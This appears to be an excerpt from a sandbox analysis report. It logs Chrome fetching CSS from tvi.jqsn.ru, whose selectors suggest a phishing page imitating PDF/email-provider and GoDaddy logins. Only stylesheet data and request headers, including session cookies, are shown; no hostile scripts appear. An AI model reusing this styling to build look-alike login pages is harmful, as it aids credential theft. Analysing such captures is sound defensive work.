                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 20 55 49 22 2c 22 4d 61 6c 67 75 6e 20 47 6f 74 68 69 63 22 2c 22 45 73 74 72 61 6e 67 65 6c 6f 20 45 64 65 73 73 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 48 69 6d 61 6c 61 79 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 4e 65 77 20 54 61 69 20 4c 75 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 50 68 61 67 73 50 61 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 54 61 69 20 4c 65 22 2c 22 4d 69 63 72 6f 73 6f 66 74 20 59 69 20 42 61 69 74 69 22 2c 22 4d 6f 6e 67 6f 6c 69 61 6e 20 42 61 69 74 69 22 2c 22 4d 56 20 42 6f 6c 69 22 2c 22 4d 79 61 6e 6d 61 72 20 54 65 78 74 22 2c 22 43 61 6d 62 72 69 61 20 4d 61 74 68 22 7d 2e 77 65 62 73 69 74 65 73 65 63 74 69 6f 6e 73 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31
                                                                                                                          Data Ascii: rosoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:1
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 33 70 78 3b 6c 65 66 74 3a 33 37 70 78 3b 77 69 64 74 68 3a 36 70 78 3b 68 65 69 67 68 74 3a 31 38 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 30 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 7b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 34 30 70 78 20 34 30 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 31 2e 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 20 6c 64 73 2d 73 70 69 6e 6e 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c
                                                                                                                          Data Ascii: s-spinner div:after{content:" ";display:block;position:absolute;top:3px;left:37px;width:6px;height:18px;border-radius:20%;background:#000}#sections_pdf .lds-spinner div{transform-origin:40px 40px;animation:1.2s linear infinite lds-spinner}#sections_pdf .l
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 31 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 62 67 5f 67 72 61 64 69 61 6e 69 6e 66 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 39 32 29 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 62 69 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 25 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 61 6c 6c 42 6c 6f 63 6b 7b 70 6f 73 69 74 69 6f 6e 3a 72
                                                                                                                          Data Ascii: th:100%;display:flex;justify-content:center;align-content:center;z-index:100001}#sections_pdf .bg_gradianinfo{background:rgba(0,0,0,.192)}#sections_pdf .loaderbig{position:absolute;width:100px;height:100px;margin-top:15%}#sections_pdf .allBlock{position:r
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 73 70 61 63 65 6c 6f 67 69 6e 32 22 20 22 73 70 61 63 65 6c 6f 67 69 6e 31 22 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 69 64 65 62 6f 78 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 70 63 20 35 70 78 20 30 20 30 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 20 30 20 33 2e 37 35 70 74 20 2e 30 35 32
                                                                                                                          Data Ascii: spacelogin2" "spacelogin1";justify-content:center;overflow:hidden;line-height:1.5}#sections_pdf .login .sidebox{align-items:center;justify-items:center;display:flex;border-radius:.3125pc 5px 0 0}#sections_pdf .login .loginbox{border-radius:0 0 3.75pt .052
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 3a 63 65 6e 74 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 69 6e 66 6f 73 70 61 6e 3e 2a 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 50 6c 61 79 66 61 69 72 20 44 69 73 70 6c 61 79 27 2c 73 65 72 69 66 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 7b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 63 68 6f 73 65 65 6d 61 69 6c 73 3e 73
                                                                                                                          Data Ascii: :center}#sections_pdf .login .selectProvider .infospan>*{color:#fff;font-family:'Playfair Display',serif}#sections_pdf .login .selectProvider .choseemails{width:360px;height:auto;margin:30px;display:flex}#sections_pdf .login .selectProvider .choseemails>s
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 73 65 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 69 6e 66 6f 72 6d 7b 74 6f 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 6f 75 74 66 6f 72 6d 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 2e 34 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 75 6e 73 65 74 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 70 72 6f 67 72 65 73 73 44 6f 74 7b 30 25 2c 32 30 25 7b 6c 65 66 74 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 65
                                                                                                                          Data Ascii: se{from{opacity:.4;pointer-events:none}}@keyframes fadeinform{to{opacity:.4;pointer-events:none}}@keyframes fadeoutform{from{opacity:.4;pointer-events:none}to{opacity:1;pointer-events:unset}}@keyframes progressDot{0%,20%{left:0;animation-timing-function:e
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 32 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 33 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2e 35 73 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 7b 61 6e 69
                                                                                                                          Data Ascii: nimation-delay:.2s}#sections .loading-container.loading .dot-floating:nth-child(3){animation-delay:.35s}#sections .loading-container.loading .dot-floating:nth-child(4){animation-delay:.5s}#sections .loading-container.loading .dot-floating:nth-child(5){ani
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 69 6e 70 75 74 7b 70 61 64 64 69 6e 67 3a 36 70 78 20 31 30 70 78 20 36 70 78 20 30 3b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 23 36 36 36 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 30 20 31 70 78 3b 68 65 69 67 68 74 3a 33 36 70 78 3b 6f 75 74 6c 69 6e 65 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 7d 2e 69 6e 70 75 74 3a 68 6f 76 65 72 2c 69 6e 70 75 74 5b 74
                                                                                                                          Data Ascii: (0,0,0,.2);box-shadow:0 2px 6px rgba(0,0,0,.2)}.input{padding:6px 10px 6px 0;border:2px solid #666;border-width:0 0 1px;height:36px;outline:0;border-radius:0;-webkit-border-radius:0;background-color:transparent;width:calc(100% - 20px)}.input:hover,input[t
                                                                                                                          2024-04-17 00:34:49 UTC1369INData Raw: 2d 63 6f 6e 74 72 6f 6c 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 30 7d 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 7d 2e 61 6c 65 72 74 2d 65 72 72 6f 72 7b 63 6f 6c 6f 72 3a 23 65 38 31 31 32 33 7d 69 6e 70 75 74 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2b 6c 61 62 65 6c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 62 6f 72 64 65 72 2d 72 61 64 69 75
                                                                                                                          Data Ascii: -control:first-child{border-bottom-right-radius:0;border-top-right-radius:0}.input-group-addon:last-child{border-bottom-left-radius:0;border-top-left-radius:0;border-left:0}.alert-error{color:#e81123}input.form-control+label.input-group-addon{border-radiu


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.449777104.21.3.1474433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:48 UTC1380OUTGET /xygiTdFpqHPcd30 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:50 UTC754INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:49 GMT
                                                                                                                          Content-Type: text/css;charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="xygiTdFpqHPcd30"
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ipuq5VQqsVfJelye9nyajgyQ3PP%2BDyaAcGXCjuXKaB1CsjQNm0L7g82B3K1lTyh1pJR%2B7mOZ5kC1I1bbMAholS8LW%2F0yfhI9g6uFm%2FIuk5hvKCWuHN6MIybl%2FsPv%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854ddfa1207e2-ATL
                                                                                                                          2024-04-17 00:34:50 UTC615INData Raw: 37 63 39 66 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 62 6f 6c 64 2e 77 6f 66 66 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20
                                                                                                                          Data Ascii: 7c9f@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family:
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 66 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 2d 76 61 72 69 61 74 69 6f 6e 73 27 29 3b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 2d 31 30 46 46 46 46 3b 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 67 64 73 68 65 72 70 61 27 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 20 39 30 30 3b 73 72 63 3a 20 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 75 72 6c 28 27 2f 77 65 62 38 2f 61 73 73 65 74 73 2f 66 6f 6e 74 73 2f 47 44 53 68 65 72 70 61 2d 76 66 32 2e 77 6f 66 66 32 27 29 20 66 6f 72 6d 61 74 28
                                                                                                                          Data Ascii: f.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format(
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 6e 73 65 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75 74 74 6f 6e 20 7b 0d 0a 20 20 2d 2d 75 78 2d 62 75 74 74 6f 6e 2d 69 63 6f 6e 2d 6d 61 72 67 69 6e 3a 20 63 61 6c 63 28 28 76 61 72 28 2d 2d 75 78 2d 74 33 37 39 6f 76 2c 76 61 72 28 2d 2d 75 78 2d 6a 77 35 73 39 6a 2c 31 2e 35 29 29 20 2a 20 31 65 6d 20 2d 20 31 2e 35 65 6d 29 20 2f 20 32 29 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29
                                                                                                                          Data Ascii: nset;}#sections_godaddy .ux-button { --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2); padding: 0; text-decoration: var(--ux-1f7if5p,underline); -webkit-text-decoration: var(--ux-1f7if5p,underline)
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 69 6e 6c 69 6e 65 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 20 7b 0d 0a 20 20 70 61 64 64 69 6e 67 2d 69 6e 6c 69 6e 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 62 6c 6f 63 6b 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 62 6c 6f 63 6b 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a
                                                                                                                          Data Ascii: --padding-size);}#sections_godaddy .ux-space.ux-space--inline:not(:empty) { padding-inline: var(--uxSpace--padding-size);}#sections_godaddy .ux-space.ux-space--block:empty { display: inline-flex; block-size: var(--uxSpace--padding-siz
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 31 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 33 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 32 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65
                                                                                                                          Data Ascii: ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize2: calc(var(--uxText--fontSize1) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize3: calc(var(--uxText--fontSize2) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125)); --uxText--fontSize
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 2e 75 78 2d 74 65 78 74 2d 65 6e 74 72 79 2d 73 75 67 67 65 73 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 67 64 73 68 65 72 70 61 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 61 6c 65 72 74 20 73 76 67 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 20 20 66 69 6c 6c 3a 20 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 74 65 78 74 2d 69 6e 70 75 74 2d 73 68 65 6c 6c 20 2e 75 78 2d 74 65 78 74 2d 63 61 70 74 69 6f 6e 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 36 70 78 3b 0d 0a 20 20
                                                                                                                          Data Ascii: .ux-text-entry-suggestion { font-family: gdsherpa; font-weight: 500;}#sections_godaddy .ux-alert svg { color: currentColor; fill: currentColor;}#sections_godaddy .ux-text-input-shell .ux-text-caption { margin-top: 6px;
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 64 69 72 65 63 74 69 6f 6e 3a 20 72 6f 77 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 65 6e 64 20 7b 0d 0a 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 73 72 2d 6f 6e 6c 79 20 7b 0d 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 68 65 69 67 68 74 3a 20 31 70 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 63 6c 69 70 3a 20
                                                                                                                          Data Ascii: direction: row!important;}#sections_godaddy .justify-content-end { justify-content: flex-end!important;}#sections_godaddy .sr-only { position: absolute; width: 1px; height: 1px; padding: 0; overflow: hidden; -webkit-clip:
                                                                                                                          2024-04-17 00:34:50 UTC1369INData Raw: 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 20 7b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 62 75 74 74 6f 6e 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 69 6e 70 75 74 5b 74 79 70 65 3d 63 68 65 63 6b 62 6f 78 5d 20 7b 0d 0a 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2e 30 39 33 37 35 72 65 6d 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75
                                                                                                                          Data Ascii: utton,html [type=button] { -webkit-appearance: button;}#sections_godaddy input[type=checkbox] { box-sizing: border-box; padding: 0; vertical-align: .09375rem;}#sections_godaddy .container { margin-left: auto; margin-right: au
